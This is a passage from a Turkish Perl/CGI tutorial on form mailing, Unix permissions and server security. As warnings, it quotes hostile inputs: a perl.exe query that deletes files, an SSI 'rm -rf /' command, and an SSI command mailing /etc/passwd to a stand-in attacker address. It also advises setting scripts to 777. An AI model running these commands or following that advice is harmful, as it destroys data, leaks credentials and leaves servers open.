
Fakat bir durum var: Ziyaretçi özene-bezene formu doldurdu; Perl büyük bir beceriyle, bu bilgileri
dosyaya ekledi. Bizim Site sahibi olarak bu durumdan haberimiz olması gerekmiyor mu? Veya başka bir
deyişle Perl programımızın bu durumu bir elektronik mesajla bize bildiresini istiyoruz.

Bunun için bütün yapacağımız iş, form_islem.pl programında teşekkür bölümünden önce, bir e-posta
yollama bölümü koymaktan ibaret. HTTP Server, CGI’dan aldığı talep üzerine, kendi bulunduğu
bilgisayardaki programları çalıştırabilir. Bu programlar arasında elektronik mesaj gönderme programı
olan “sendmail” vardır. Web Server programlarının elektronik mesaj gönderme programları farklıCGI / Perl                                          95
olabilir; sizin site yönetmeni olarak kullanabileceğiniz elektronik posta gönderme programının adını ve
adresini, Web Server yönetimi verebilir. Ücretsiz Web sitesi hizmeti veren şirketler genellikle CGI
programı çalıştırmaya ve elektronik mesaj göndermeye izin vermezler. Eğer Web sitenize evsahipliği
yapan firma CGI ve elektronik posta gönderme desteği veriyorsa muhtemelen bunun için gerekli
FORM/ACTION bilgisini de size verecektir. Bu tür bilgiler genellikle evsahibi firmanın sıkça sorulan
sorular belgelerinde de bulunabilir. Unix tabanlı Server’larda hemen hemen daima elektronik mektup
gönderme işlemi “sendmail” programı ile yapılır ve bu program “/usr/sbin/” veya “/usr/lib/” dizininde
bulunur.

CGI programımızla HTTP Server’a bir programı çalıştırması için komut göndermekle, bir dosyayı yazmak-
okumak-eklemek için açtırtmak arasında fark yoktur; bu işlemi de “open() fonksiyonu ile yaparız.
Örneğin:

open(MEKTUP, "|/usr/sbin/sendmail -t $kime") || die ("sendmail
programını bulamıyorum");

Burada dikkat edeceğiniz nokta, open() fonksiyonunu dosya açtırmada kullandığımızdan farklı olarak
programın yolu ve adından önce pipe (|) simgesini kullanmış olmamızdır. Bu Unix sistemlerinde HTTP
Server’ın başka bir programı çağırdığımızı anlamasını sağlar. Yukarıdaki örnek kodda, “#teşekkür
bölümü” satırının üstüne şu kodları girin: ($kime değişkeninin karşısına isim yerine e-posta adınızı ve
adres.com yerine de elektronik posta adresinizi yazmanız gerekir. Örnek olarak, bu kodu ben yazıyor
olsa idim, bu satırı şöyle yazmam gerekirdi: $kime = "hocal\@pcworld.com.tr ";)

 # e-posta yollama bölümü

 $kime = "isim\@adres.com";

 open(MEKTUP, "|/usr/sbin/sendmail -t $kime") || die ("sendmail programını
 bulamıyorum");

  print MEKTUP "Kimden: $formveri{'eposta'}\n";

  print MEKTUP "Kime: $kime\n";

  print MEKTUP "Konu: Ziyaretçi Formu\n\n";

  print MEKTUP "Adı: $formveri{'adi'}\n";

  print MEKTUP "E-Posta: $formveri{'eposta'}\n";

  print MEKTUP "İlgi alanı: $formveri{'Merak'}\n";

  print MEKTUP "Eğitim Düzeyi: $formveri{'egitim'}\n";

  print MEKTUP "Mesaj: $formveri{'mesaj'}\n";

  close(MEKTUP);
CGI / Perl                                           96
Bu ekibi yaptıktan sonra CGI programınız önce size bir ziyaretçinin daha sitenizdeki Form’u
doldurduğunu bildirecek, daha sonra ziyaretçiye teşekkür edecektir.

Burada yerimiz olmadığı için ayarıntılı olarak inceleyemediğimiz bir diğer konuk defteri-mesaj
gönderme Formu örneğini bu kitapçığın malzemesini içeren Zip dos eposta.htm ve eposta.pl adıyla
bulabilirsiniz. Özellikle bir Form’un doğru ve eksiksiz doldurulup doldurulmadığını denetleyen bölümleri
bakımından bu Perl programı örnek olabilir.

Böylece, CGI amacıyla işimize yarayacak ölçüde Perl’e başlangğıç yapmış olduk. Bu bizi Perl uzmanı
yapmıyor. Ama artık hiç olmazsa, HTML Form’larımız için gerekli CGI programını yazabiliriz. CGI
konusunda buraya kadar değinmediğimiz fakat bir Web tasarımcısının bilmesi gereken noktaları son
bölümde bulabilirsiniz.
CGI / Perl                                           97
       CGI’da Yaşam


CGI programı ve Perl öğrenme zorunluğu bir çoğumuz için Web sitemizdeki Form’lara ziyaretçilerimizin
yazdıkları metinleri almak, saklamak ve kullanmak amacından kaynaklanıyor. Bu kitapçığın başında
yaptığımız gibi kendi bilgisayarımıza kişisel Web Server kurmak ve Perl’ü bu Server’da işler hale
getirmek, belki Perl programlarımızı sınamak açısından gerekli; fakat gerçek bir Web Server’da CGI
programı çalıştırmaktan çok kolay bir işlemdir.

Gerçek Internet’te HTTP Server olarak çalışan bilgisayarlarda güvenlik büyük bir öncelik taşır. CGI
programlarımızı gerçek bir Web Server’da çalıştırabilmek için sadece CGI ve Perl bilgisine değil, fakat
gerçek hayatta geçerli CGI uygulamalarındaki ilkeleri, kuralları ve hatta gelenekleri öğrenmek
zorundayız. CGI yoluyla sitemize evsahipliği yapan Web Server’ın bir çok dosya işlemi ve elektronik
mesaj gönderme hizmeti yapmasını sağlayabiliriz. Bunun için Server’ları ve Web sitemize ev sahipliği
yapan bilgisayarın işletim sistemini biraz daha yakından tanımak zorundayız.

CGI, Web Server’a Bağımlıdır


Piyasada 20’ye yakın Web Server programı var; bunların hemen hepsi, kendilerine evsahipliği yapan
işletim sistemi ile Internet ziyaretçisi arasında arabuluculuk yapan bir tür CGI (Common Gateway
Interface/Ortak Geçit Arayüzü) vardır. Web Server, site tasarımcısı olarak sizin vereceğiniz sınırlar
çerçevesinde Internet ziyaretçisinin çalıştırmak istediği programı çalıştırır ve gerekiyorsa bunun için
işletim sisteminden yardım isteyebilir.

CGI’da çalıştırabileceğiniz tek program Perl programı değildir. Yeni Web Server programları, işletim
sisteminin sağladığı API (Application Programming Interface/Uygulama Programlama Arayüzü) imkanını
kullanarak geliştirilebilecek EXE ve DLL türü programları da çalıştırabilir. Özellikle Windows
95/98/NT/2000 tabanlı WindowsCGI, standart CGI’ın sağladığından fazla imkanlar sağlayabilir. Bununla
birlikte, Perl ile herhangi bir CGI için program yazabilirsiniz.

CGI programı yazmak için Perl dışında, C, C++, Tcl veya Tk, PHP, Unix Shellerinden sh, ksh ve csh ile
Visual Basic, ASP ve AppleScript dillerini veya tekniklerini kullanabilirsiniz.

Web sitenize evsahipliği yapan firmanın (Hosting şirketi) Web Server’ının ne tür CGI programlarına izin
verdiğini öğrenmek ve yazacağınız Perl programlarının bu kurallara uymasını sağlamak, site tasarımcısı
ve yönetmeni olarak size düşen bir görevdir. Ücretsiz Web sitesi alanı sağlayan firmalar kimi zaman
sadece kendi onaylarından geçmiş Perl programlarına izin verirler. CGI programınızın neler
yapabileceğini, neler yapamayacağını, bu kurumun sağladığı yardım dosyalarında bulabilirsiniz. Web
sitenize evsahipliği yapacak firma seçerken, ilanlarında “sınırsız CGI desteği” verdiklerini belirtmelerine
dikkat etmelisiniz.
CGI / Perl                                            98
Tekerleği yeniden icad etmeyin! Web Server işletmecileri çoğu zaman site hizmeti verdikleri
müşterilerine kullanılmaya hazır CGI programları sunarlar. Bu programlar hemen hemen daima,
işletmecinin sahip olduğu Web Server programının inceliklerine göre geliştirilmiştir.

Ayrıca Comprehensive Perl Archive Network (CPAN) isimli Perl Arşivi’nde hemen hemen her konuda
işinize yarayacak Perl programı bulabilirsiniz. Bu amaçla uğrayacağınız ilk Internet adresi Perl Enstitüsü
(www.perl.org) olmalıdır. Perl Home Page (www.perl.com) ve Windows için Perl yorumlayıcısı geliştiren
ActiveState (www.ActiveState.com), bu arşive ulaşmak için kestirme yollar arasındadır.

UNIX Dosya izinleri


Web Server programı Unix ortamında çılışıyorsa, her dosya ya bir kişiye, ya da bir gruba aittir. Her
dosyanın üç set izin durumu vardır: sahibi, grup ve bu ikisine girmeyen idğer herkes için bir dosya (a)
okunabilir; (b) yazılabilir, ve (c) çalıştırılabilir olur, veya olmaz.

Bir Unix sisteminde sistem yöneticisi veya root olarak oturum açmış kişi, dosyaların sahiplik durumunu
chown komutu ile değiştirebilir. Bir dosyanın sahibi olan kişi veya grubun üyeleri ise dosyanın izin
haklarını düzenleyebilir. Unix, bir dosyanın okunabilmesi, yazılabilmesi veya bir dizinde yeni bir dosya
veya alt-dizin oluşturulabilmesi için, dosyanın ve dizinin okuma, yazma ve çalıştırma izinlerinin bulunup
bulunmadığına bakar.

Bu ilkeler, Unix ortamında çalışan bir Web Server’da, Web alanındaki dosyalara uygulandığında, Perl
program dosyalarının çalıştırılabilme izni olması gerektiği anlaşılır. Ayrıca, Perl programlarının okumak
ve yazmak için erişmek zorunda olduğu diğer bütün dosyaların da okunabilirlik ve yazılabilirlik izni
olması şarttır. Web Sitesine ev sahipliği yapan firma, sizi, size ayırdığı ve Web Server’ına “Web Sitesi”
olarak tanıttığı dizinin sahibi yapmıştır. Siz bu yetkinize dayanarak, Web sitenizdeki dosyaların izinlerini
değiştirebilir; düzenleyebilirsiniz.

Unix’te dosya izinleri ya komut istemci satırından chmod komutu ile, ya da 8 tabanlı sayı sistemi (octal)
ile sayısal olarak verilebilir. Sayılan değer olarak verilen izin sistemi şöyle düzenlenebilir:

Okuma izni 4, yazma izni 2, çalıştırma izni ise 1 olarak gösterilir. Kullanıcı kişinin izinleri 100, grubun
izinleri 10 ve diğerleri 1 olarak simgelenir. Bir dosyanın izin değeri, bütün izin değerlerinin toplamı
olarak ifade edilir. İzin değeri ise “sahip katsayısı X izin türü katsayısı” olarak bulunur. Örnğin bir
dosyasının sahibinin okuma izni olması 100 x 4=400 olarak hesaplanır; bir dosyanın sahibinin yazma izni
200, çalıştırma izni ise 100’dür. Yani dosyanın sahibi dosyayı hem okutabilir,hem yazdırabilir,hem de
çalıştırabilirse, dosyanın izin değeri 700 olur. Grubun okutma izni 40 yazdırma izni 20, çalıştırma izni 10
olarak hesaplanabilir; toplamı 70 olu. Bir dosyayı hem sahibi hem de grup, okutabilir, yazrırabilir ve
çalıştırabilirse, dosyanın izin değeri 770’e ulaşır. Diğer herkes (veya Unix’teki deyimiyle tüm dünya)
tarafından okunabilen, yazılabilir ve çalıştılabilen dosyanın izin değeri 777 olur.
CGI / Perl                                             99
Server Güvenliği


Web Server programı, bir bilgisayarın ve onun bağlı olduğu ağın dış dünyaya açılan kapısı ise CGI, dış
dünyanın Web Server’a giriş kapısıdır. CGI güvenliği, bütün Web Server’ın güvenliğidir. Eğer kendi Web
Server’ınızı çalıştırıyorsanız, program üreticisinin önerdiği güvenlik önlemlerini almanız gerekir. Web
Server programı başkası tarafından çalıştırılıyorsa, muhtemelen sizin Perl programlarınızla Server’a
zarar vermenizin önüne geçilmiş demektir. Ancak sizin sitenizin (veya teknik ifadesiyle, Server’da size
ayrılmış olan alanın güvenliği yine sizden sorulur.

Perl programları, bütün Script dilleri gibi kaynak kodunu kendi içinde barındırır; yani Perl dosyanızın tam
metin olarak kötüniyetli bir kişinin eline geçmesi, programın ve dolayısıyla sitenin zaaflarını ortaya
çıkartır. Bir örnek verelim.

Ziyaretçilerinizin size güvenerek doldurduğu formlarda elektronik posta adresi gibi, herkesin eline
geçmesini istemeyecekleri bilgiler bulunabilir; siz bu bilgileri, (bizim yukarıdaki örneklerde yer alan
form_bilgileri.txt dosyası gibi) bir dosyada topluyor olabilirsiniz. Ben bu dosyanın adını ve durduğu yeri
bilirsem, ve bunu Browser’ımın URL adres hanesine yazarsam, sizin Server’ınız tereddüt bile etmeden
bu dosyayı bana gönderecektir. Benim bu dosyanın adını bilmem ancak sizin Perl dosyasını tam metin
olarak elime geçirmemle mümkün olabilir. Perl dosyanızın adı, Form içeren HTML sayfanızda, FORM
etiketinin ACTION hanesinde kayıtlı! Bu ismi Browser’ımın URL hanesine yazarsam, Web Server hata
mesajı verir; çünkü Perl programı kendisine bilgi gönderilmeden çalıştırılmış olacağı için hata
oluşacaktır. Fakat bir çok kişi, CGI programlarını yeniledikçe, güncelleştirdikçe veya düzelttikçe, eskisini
“.bak” uzatmasıyla Server’da tutmayı tercih eder. Bazı programlama editörleri de dosyaların adına “~”
işaretini ekleyerek yedeğini çıkartırlar. Bazı programcılar, Perl metinlerinin bir de “.txt” sürümünü
saklamayı tercih ederler. Eğer sizin Perl programını edinmeyi kafasına koymuş bir kişi önce bu tür
uzatmalardan işe başlayacaktır.

Bir diğer büyük güvenlik ihlali dünyaya perl programınızı çalıştıran Perl yorumlayıcısının (örneğin
perl.exe’nin) yerini ilan etmektir. Perl programlarının baş tarafında bunu belirten ifadeler olması, Web
için asla zorunlu değildir. Herhangi bir formdan GET yoluyla Perl.exe’ye Perl komutu gönderiyorsanız
(örneğin: sizin bir Formunuz’un istediği bilgi giderken kullanıcının Browser’ımın adres hanesinde
“http://host.com/cgi-bin/perl.exe?form.pl” gibi bir gönderi belirtisi görülüyorsa) bu kötüniyetli kişilere
Browser’larının adres hanesine şu satırı yazma davetiyesidir:

“http://host.com/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B”

Bu, bir PC’de “C:\>del c:\*.*” komutunu vermek ve ondan sonra “Y” tuşuna basmakla aynı sonucu verir!

Perl yorumlayıcısının yerini Internet ziyaretçisini anlamasına imkan vermemek gerekir.

Bir diğer önemli güvenlik ihlali aracı Server Side Include denen ve ”<!--“ ile “ -->” arasında Server’a
belirli komutları icra etme, belirli programları çalıştırma imkanı veren düzenlemedir. Giderek daha ç
sayıda Server yöneticisi bu imkanı kaldırıyor. Server bu tür Server Side Incvlude (SSI) komutlarını kabul
ediyorsa, şu komutan örreğin bir Formun kullanıcı adı veya adresi olarak gelmesi işten bile değildir:


CGI / Perl                                            100
    <!--#exec cmd=”/bin/rm –rf /“ -->”

Bu komut da Unix ortamında, DOS’ta “C:\>del c:\*.*” komutunu vermek ve ondan sonra “Y” tuşuna
basmak demektir. Veya SSI taklidi yapan şöyle bir komut:

    <!--#exec cmd=”/bin/mail hacker@cracker.com < /etc/passwd“ -->”

Bu komutla bilgisayarınızdaki bütün parolalar, Hacker’a elektronik mesaj olarak gönderilecektir. Bu
kitaptaki örneklerimizde bir Form’dan aldığımız bilgileri “$deger =~s/<!--(.|\n)*-->//g;” deyimi ile bu tür
komutlardan temizlediğimizi görmüş olmalısınız. Fakat bu kitapçık Web Server güvenliğinin nasıl
sağlanacağına değinebilmek için çok küçük; ve çoğu zaman Web Server güvenliğini sağlamak CGI
programcısının değil, Server yönetmeninin görevidir. CGI programcısı olarak bize düşen, en azından
Form bilgilerini işlemeye başlarken, bir alanda olması gerekmeyen karakterler varsa, onları
temizlemektir. Örneğin bir Form’un isim ve elektronik adres hanelerinde”ters bölü işaretinin bulunması
gerekmez! Bu alanlarda bu tür işaretler varsa, temizlenmesi yerinde olur.

Server’da program çalıştırmak


HTTP Server’da çalıştıracağımız başalıca programın elektronik mesaj gönderme programı olduğuna
yukarıda değindik. Bunun dışında en sık kullanmak isteyebileceğiniz komutlardan biri örneğin DOS’un
“c:\> dir” veya Unix’in “ls” komutuna benzeyen “readdir()” fonksiyonudur. Perl, bu fonksiyonu içinde
bulunduğu CGI ortamına ve işletim sistemine uygun tarzda çalıştırır. Bu kodun kullanımına bir örnek
verebiliriz:

print "Content-type: text/html\n\n";

print "<meta http-equiv=\"content-type\" content=\"text/html;
charset=ISO-8859-9\">\n";

print "<meta http-equiv=\"Content-Type\" content=\"text/html;
charset=windows-1254\">\n";

print "<H3><CENTER>Dizindeki dosyalar</CENTER></H3>\n";opendir (DIZIN, ".");

while($dosya_adi = readdir(DIZIN)) {

    if ($dosya_adi =~ /^\w*.htm/){

    push(@dosyalar, $dosya_adi);

    print "<A HREF=\"$dosya_adi\"> $dosya_adi </A>\n";

    print "<BR>\n";CGI / Perl                                           101
     }

}

closedir(DIZIN);

Burada opendir() fonksiyonunun programın bulunduğu dizinde yani kısaltması nokta (.) işareti olan
dizini içeriği okunmak üzere ve DIZIN tutamağı (Handle) ile açtığına dikkat edin. Buradaki tutamak da
tıpkı okunmak-yazılmak üzere açılan bir dosya tutamağı gibi tamamen keyfî bir kelimedir. Program daha
sonra dizindeki dosya adlarını okuyarak uzatması “.htm” olanları @dosyalar dizisinde topluyor ve bu
listeyi ziyaretçinin ekranında görüntülüyor. (Bu programı örneğin “dir.pl” adıyla da kaydedebilir ve
dizinlerin içindeki dosyaları ziyeretçilerinize listelemeniz gerektiği yerde bir köprü ile kullanabilirsiniz.)

Server ile FTP İlişkisi


Özene bezene yazdığınız ve kendi kişisel Web Server’ınızda başarıyla sınadığınız bir CGI programının
Web sitesinde çalışmaması kadar üzücü bir şey olamaz. Bunun bir çok sebebi olabilir; fakat bu
sebeplerin başında Web Server işletmecisinin CGI programlarına izin vermemesi gelir. Diğer sebepleri
araştırmaya başlamadan önce Web sitenize evsahipliği yapan firmanın CGI programlarına izin
verdiğinden imen olmalısınız.

CGI programlarına izin veren bir sitede Perl programlarının işlememesinin birinci sebebi dosya ve dizin
izinlerinin doğru ayarlanmamış olmasıdır. Sitenize evsahipliği yapan firmanın Web Server’ı Unix-tabanlı
ise ve bir FTP programının yardımı ile dizin ve dosyalarınızın izinlerini dosyaları okumanıza, yşazmasına
ve çalıştırmanıza imkan verecek şekilde değiştirebilirsiniz. Internet ziyaretçileriniz Unix açısından dosya
sahibi kişi ve grubunda dışında kalan herkes sayılır; dolayısıyla Perl programlarınızın tüm dünya için
okuma-yazma-çalıştırma izni bulunması, yani Octal sayı olarak dosya izin değerinin 777 olması gerekir.

Perl programlarınızın işlememesinin bir diğer sebebi, bilgisayarınızdan Server’a FTP programı ile
gönderilirken ASCII dosyası transfer yöntemi yerine binary dosya transfer yöntemi kullanılması
olmasıdır.

Piyasada yaygın kullanılan CuteFTP ve WS_FTP programları genellikle transfer etmek istediğiniz
dosyanın düz yazı dosyası mı, yoksa grafik-ses-multimedya veya program dosyası mı olduğunu anlayıp,
uygun transfer yöntemini kullanabilirler. Perl programları düz yazı dosyaları olduğu için FTp programları
bunları ASCII transfer yöntemiyle gönderirler. Ancak siz kullanıcı olarak FTP programını yanlışlıkla
sadece binary yöntemini kullanmaya zorlamış olabilirsiniz. Kontrol etmeniz gereken ikinci nokta, FTP
programınızın hangi yöntemle transfer yaptığı olmalıdır.

Bazı Web Server programları, güvenlik kaygısıyla sadece cgi-bin dizinindeki Perl programlarını
çalıştırmak üzere ayarlanabilir. Sitenizin evsahibininin böyle bir zorunluk getirip getirmediğini
araştırmalısınız; ve böyle bir zorunluk varsa, bütün Perl programlarınızı cgi-bin dizinine koymalısınız.CGI / Perl                                             102
W/O: 179586
CGI / Perl  103

				
DOCUMENT INFO
Shared By:
Categories:
Tags: PERL, Nedir
Stats:
views:32
posted:3/29/2012
language:Turkish
pages:103